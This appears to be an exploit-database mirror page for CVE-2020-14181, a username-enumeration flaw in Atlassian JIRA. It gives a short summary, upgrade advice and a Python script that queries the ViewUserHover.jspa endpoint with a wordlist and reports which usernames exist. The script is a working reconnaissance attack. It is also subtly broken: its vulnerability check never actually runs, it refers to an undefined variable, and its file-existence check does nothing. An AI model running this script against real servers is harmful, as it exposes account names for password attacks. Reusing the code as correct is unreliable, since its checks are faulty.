header-logo
Suggest Exploit
vendor:
JIRA
by:
Dolev Farhi
5.3
CVSS
MEDIUM
User Enumeration
200
CWE
Product Name: JIRA
Affected Version From: < 7.13.16, 8.0.0
Affected Version To: < 8.5.7, 8.6.0
Patch Exists: YES
Related CWE: CVE-2020-14181
CPE: a:atlassian:jira
Metasploit: https://www.rapid7.com/db/vulnerabilities/atlassian-jira-cve-2020-14181/
Other Scripts: N/A
Platforms Tested: None
2020

Atlassian JIRA 8.11.1 – User Enumeration

This vulnerability allows an attacker to enumerate valid usernames on Atlassian JIRA versions < 7.13.16, 8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.12.0. An attacker can send a GET request to the ViewUserHover.jspa endpoint with a valid username and if the response does not contain the string 'User does not exist', then the username is valid. This vulnerability was discovered by Dolev Farhi and was assigned CVE-2020-14181.

Mitigation:

Upgrade to the latest version of Atlassian JIRA. Additionally, ensure that the ViewUserHover.jspa endpoint is not publicly accessible.
Source

Exploit-DB raw data:

# Title: Atlassian JIRA 8.11.1 - User Enumeration
# Author: Dolev Farhi
# Vulnerable versions: version < 7.13.16,  8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.12.0
# CVE: CVE-2020-14181
# Credit to original CVE author: Mikhail Klyuchnikov of Positive Technologies.

import sys
import os
import requests

def help():
    print('python3 script.py <target> <usernames_file>')
    print('e.g. python3 script.py https://jiratarget.com usernames.txt')
    sys.exit()

if len(sys.argv) < 3:
  help()

server = sys.argv[1]
usernames = sys.argv[2]

random_user = '0x00001'

try:
  os.path.exists(usernames)
except:
  print(usernames, 'file does not exist.')
  sys.exit(1)

def test_vulnerable():
  resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username))
  if 'User does not exist: {}'.format(random_user) in resp.text:
    return True
  return False

if test_vulnerable is False:
  print('server is not vulnerable.')
  sys.exit(1)

f = open(usernames, 'r').read()

for username in f.splitlines():
  resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username))
  if 'User does not exist' not in resp.text:
    print('EXISTS', username)

Navigation

Suggest Exploit

Services By CQR